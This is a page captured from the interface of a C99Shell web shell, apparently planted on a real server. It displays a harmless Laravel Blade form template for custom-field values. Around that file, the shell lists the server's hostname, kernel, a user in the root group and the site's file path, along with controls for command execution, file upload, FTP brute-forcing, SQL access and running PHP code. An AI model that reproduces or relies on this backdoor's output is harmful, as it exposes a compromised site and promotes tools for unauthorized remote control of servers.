!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/Modules/CustomField/Resources/views/value/   drwxr-xr-x
Free 28.28 GB of 117.98 GB (23.97%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     create.blade.php (1.56 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<form class="form-horizontal"
    action=" {{ request()->routeIs('module.custom.field.edit.value') ? route('module.custom.field.update.value', $value->id) : route('module.custom.field.store.value', $field->id) }}"
    method="POST">
    @csrf
    @if (request()->routeIs('module.custom.field.edit.value'))
        @method('PUT')
    @endif
    <div class="col-md-12">
        <div class="row h-100 justify-content-center align-items-center">
            <div class="col-md-12 mb-2">
                <x-forms.label name="option_name" for="option_name" required="true" />
                <input type="text" name="option_name" class="form-control @error('option_name') is-invalid @enderror"
                    value="{{ request()->routeIs('module.custom.field.edit.value') ? $value->value : old('option_name') }}"
                    id="option_name" placeholder="{{ __('option_name') }}">
                @error('option_name')
                    <span class="invalid-feedback">{{ $message }}</span>
                @enderror
            </div>
        </div>
    </div>
    <div class="row mt-4">
        <div class="col-12 text-center">
            <button type="submit" class="btn btn-success">
                @if (request()->routeIs('module.custom.field.edit.value'))
                    <i class="fas fa-sync"></i>
                    <span class="ml-2">{{ __('update') }}</span>
                @else
                    <i class="fas fa-plus"></i>
                    <span class="ml-2">{{ __('create') }}</span>
                @endif
            </button>
        </div>
    </div>
</form>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--